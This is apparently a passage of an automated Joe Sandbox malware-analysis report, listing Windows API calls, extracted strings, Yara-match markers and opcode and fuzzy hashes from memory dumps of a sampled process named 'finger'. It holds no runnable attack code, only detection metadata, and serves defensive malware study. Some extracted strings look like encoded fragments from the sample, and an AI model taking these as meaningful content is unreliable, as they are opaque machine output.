                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84D8BFF,00000007,00000000,00000004,00000000,02883F8F,000000F4), ref: 028999B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                              • Instruction ID: 19abf3a1c91ba64da4a6318c96964fac53cee0e2c5182feb76970a5a7c1c4ca0
                                                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                              • Instruction Fuzzy Hash: 16E065BA200204BBDA14EF59DC45EAB37AEEF89710F008018F909A7241C670B8118BB5
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(02881C06,?,0289587B,02881C06,0289586F,0289587B,?,02881C06,0289586F,00001000,?,?,00000000), ref: 02899979
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                              • Instruction ID: b2e7da6d2a3bb6a162318a6bd5d0b68164de215971bf2265cff96954feee8345
                                                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                              • Instruction Fuzzy Hash: 2EE0657A2042047BDA14EE69EC45E9B37AEEFC9710F008019F908A7240DA31B8518BB5
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0288853C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                              • Instruction ID: 797ed09261f281b22e90921aed06fa2ef861efc7109d2f3996253658dd3e6d51
                                                                                              • Opcode Fuzzy Hash: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                              • Instruction Fuzzy Hash: 1BE086BD29030827EB247BA8DC45F66339DAB48738F584660B91DDB2C1E678FA414150
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0288853C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                              • Instruction ID: 6b766fdcbad5595304aaddf068e6c3c2dd9815fab6c899fed3198cbe14c9e581
                                                                                              • Opcode Fuzzy Hash: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                              • Instruction Fuzzy Hash: DBE026FE48030827EB2037689E467AA32596B00338F2C0A64F82DDB1C3E23CD2824224
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02881EF0,028981AF,0289586F,02881EC0), ref: 02888333
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                              • Instruction ID: 1e0275e60689a96fd631bd4ea9b7a976f4eb9209ea2b8b96dda00011a5aa4b5f
                                                                                              • Opcode Fuzzy Hash: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                              • Instruction Fuzzy Hash: 1CD05E793443063BEE00B6E8DC4AF5A328D8B00798F090074BA0CDA2C1E968F5004766
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 2bcb19666ee307c38e3defe088030996553f94cde5ce27ce4e7ba745eec5c2ce
                                                                                              • Instruction ID: 1b44982ae9062c7d80fa020e90303db859e69f63c1198453c4fe8d641b5b1eb0
                                                                                              • Opcode Fuzzy Hash: 2bcb19666ee307c38e3defe088030996553f94cde5ce27ce4e7ba745eec5c2ce
                                                                                              • Instruction Fuzzy Hash: 2AB09BB1D079C9D5FE51E7A456087177D4467D0701F19C462D2030651F4739D1D1F175
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                              • Instruction ID: c99130e307e22990fc48d1038e1324876e7f52c04dd11a21dc30b1c49a8fe4d3
                                                                                              • Opcode Fuzzy Hash: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                              • Instruction Fuzzy Hash: A541E671A1CB0D4FD368EF68948167AF3E2FF45350F50062EDA8AC7352EB70E8468685
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                              • Instruction ID: d3d539581343e5142ad3ad3cf6bc3a0fcff224ea494eead0084f88fe096c1baf
                                                                                              • Opcode Fuzzy Hash: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                              • Instruction Fuzzy Hash: CCC08033E6041591D3148D5CFC817F0F3E4D797325F047356D514D3144C11AF45146D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                              • API String ID: 0-3558027158
                                                                                              • Opcode ID: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                              • Instruction ID: d45c10cc55456b1e2803715b4c647ad88a9b12d2d57e808ca69733cd20130873
                                                                                              • Opcode Fuzzy Hash: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                              • Instruction Fuzzy Hash: 0E9150F04482988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -nu$ <91$434'$80zf$994z$9<>0$:<1u$;x &$<:;z$<z`f$>:|u$`{eu$anu0$a{a{$a{e{$b{fc$dmab$g{eu$z`fb${bcu${fcu
                                                                                              • API String ID: 0-2065742749
                                                                                              • Opcode ID: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                              • Instruction ID: 1e964edb20ba8b2d53abdb6e1158f836a9fd7585382245bc673592c4d887d9bd
                                                                                              • Opcode Fuzzy Hash: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                              • Instruction Fuzzy Hash: 1141F2B480478CEBCF18CF85D9416DEBB71FF05394F904159E9096F294C7758616CB89
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: df81b7881121f3e46e114281a37ff92426e3751765e9f637d9d1e1676c0aa039
                                                                                              • Instruction ID: 34c3ae5f7c2185c2715c4bbb1495f6084ddef1f04ab1bae48b596b28252314c4
                                                                                              • Opcode Fuzzy Hash: df81b7881121f3e46e114281a37ff92426e3751765e9f637d9d1e1676c0aa039
                                                                                              • Instruction Fuzzy Hash: 5C51E8B5A0215EBFDF10DB98888097FF7FCBB48200B14C9AAE4A5D7641D234DE509BE0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: ac6cc71d80048d82c1331b6ca2c18bdf52bb82e64cc297567d06bea811312ea1
                                                                                              • Instruction ID: ca618df5bbe03bfd90ee8bc0c91e696bab97922cc3ad189d0f9efe3e2323cbb8
                                                                                              • Opcode Fuzzy Hash: ac6cc71d80048d82c1331b6ca2c18bdf52bb82e64cc297567d06bea811312ea1
                                                                                              • Instruction Fuzzy Hash: 4551F6B5A00645AFCB34DE9CC8949BFF7FDEB4C200B0488AAE495D7681D7F4DA418760
                                                                                              Strings
                                                                                              • ExecuteOptions, xrefs: 030C46A0
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030C46FC
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030C4655
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030C4742
                                                                                              • Execute=1, xrefs: 030C4713
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030C4725
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 030C4787
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: b60dd9e91189c1786a672a6185a5a7d3a8347b9ce68de467d38f75c6ecd1300f
                                                                                              • Instruction ID: f089d2b6831c5937d97e7ac7d2bc37f8a13e5bfb62670d75b785979321ccfacb
                                                                                              • Opcode Fuzzy Hash: b60dd9e91189c1786a672a6185a5a7d3a8347b9ce68de467d38f75c6ecd1300f
                                                                                              • Instruction Fuzzy Hash: B25127356023096AEF11FFA5DC95FEE73A8AF49700F1800A9D545AB191EB709A41CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction ID: 802b2a1c53ce28eeecc5b5a65368f1dce3ae24bd2cb6761e84330ccc7ab5de78
                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction Fuzzy Hash: FE022475608351AFD709DF18C890A6FBBE5EFC8710F04892DF9898B2A4DB71E915CB42
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction ID: 94ad4654b3f1142218e17634cfda67b94708d02a5d18484870de1f70be7c768d
                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction Fuzzy Hash: EC818C30A062499BFF24CE68E8917EEBBE5AF45330F18469BD861A7290C6349841EB50
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: 7dec94c7a98f0b96ab968482e4497616cacb29cb021ca577775785f7e7f7889d
                                                                                              • Instruction ID: 768eb6bd2894bca641e4df7ca048a9d75864d2e07a26a4275a13c2677e25c264
                                                                                              • Opcode Fuzzy Hash: 7dec94c7a98f0b96ab968482e4497616cacb29cb021ca577775785f7e7f7889d
                                                                                              • Instruction Fuzzy Hash: 2921957AA01219ABDB10DF79DC44AFEB7FCEF48640F080566E915D7240E770DA029BA0
                                                                                              Strings
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030C02BD
                                                                                              • RTL: Re-Waiting, xrefs: 030C031E
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030C02E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: c29a3890d59410a4cb23a60a2aa3626f1d1884b140d42be41751c9e6d53427ea
                                                                                              • Instruction ID: 17386853f3090f25bc9f21ed2935e2f3923361b6c0c4ad858b69d10604ec3598
                                                                                              • Opcode Fuzzy Hash: c29a3890d59410a4cb23a60a2aa3626f1d1884b140d42be41751c9e6d53427ea
                                                                                              • Instruction Fuzzy Hash: 19E1E130A16782DFD764CF28C884B6AB7E4BF88324F184A5DF4A58B2E0D774D844CB56
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 030C7B8E
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030C7B7F
                                                                                              • RTL: Re-Waiting, xrefs: 030C7BAC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: 992635105309fbd286456f82642201bef43da819779698ecd33843c5bc852122
                                                                                              • Instruction ID: 4638009a55e203282b41bfe13216e49892f31a7e7965af9e63884db0d1dbba4d
                                                                                              • Opcode Fuzzy Hash: 992635105309fbd286456f82642201bef43da819779698ecd33843c5bc852122
                                                                                              • Instruction Fuzzy Hash: EA41E2357067029FD724EF29C840B6AB7E5EF89720F140A1DF89A9B281DB71E4058F91
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 030C72A3
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030C7294
                                                                                              • RTL: Re-Waiting, xrefs: 030C72C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: b5628e8dae4c71a8ef0a48140df1f2f0438584878441d01af289231560a605ea
                                                                                              • Instruction ID: 63a0b27a0330bdb187215f611065d6ca147720fd19845e86b2fb4efe0cc3e88e
                                                                                              • Opcode Fuzzy Hash: b5628e8dae4c71a8ef0a48140df1f2f0438584878441d01af289231560a605ea
                                                                                              • Instruction Fuzzy Hash: A4410235702746AFD720DF25CC41B6AB7E5FF84B20F184A1DF895AB640DB21E8068BD1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 1a5bff950b249d294315fd7cc164c7716692b7412541dc0bd9719c0c03912ba8
                                                                                              • Instruction ID: ab5788c245639b3ebcfa58b2d7e0bd5e6ac93b62c9ff3c9a4232ed5fa389b652
                                                                                              • Opcode Fuzzy Hash: 1a5bff950b249d294315fd7cc164c7716692b7412541dc0bd9719c0c03912ba8
                                                                                              • Instruction Fuzzy Hash: 74318876A002199FCB20DF39DC44BEEB7F8EB48610F444596E849D7240EB709A458B60
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction ID: 6be6d1d50c51ab6bcd041f65618a42fdc8a41514d42a0e4757458628c14758ce
                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction Fuzzy Hash: DF91A372E1221A9FFF64DE69C8917BEB7F5AF84B20F18451BE865A72D0D7308940A710
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              • Opcode ID: a03480e806214d2cc2503b181a716c189b14b7dce5022e3d7832ff83a150bcc9
                                                                                              • Instruction ID: c301137af02683bb48743b6e97717e2b161e28746491a00c82af079ba6d995db
                                                                                              • Opcode Fuzzy Hash: a03480e806214d2cc2503b181a716c189b14b7dce5022e3d7832ff83a150bcc9
                                                                                              • Instruction Fuzzy Hash: CA8138B5D01269DBDB25DB54CC44BEEB7B8AF48750F0445EAE919B7280E7309E80CFA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$0$@$@
                                                                                              • API String ID: 0-1132210376
                                                                                              • Opcode ID: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                                                              • Instruction ID: ec6f2a9f0986bb4a9545b3594792e08a9bd506ccc4707495cf58bb98d3fc386c
                                                                                              • Opcode Fuzzy Hash: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                                                              • Instruction Fuzzy Hash: 1651B1716187488FCB18DF68C8856DEBBF0FB89754F10019FE98A93241C734E546DB86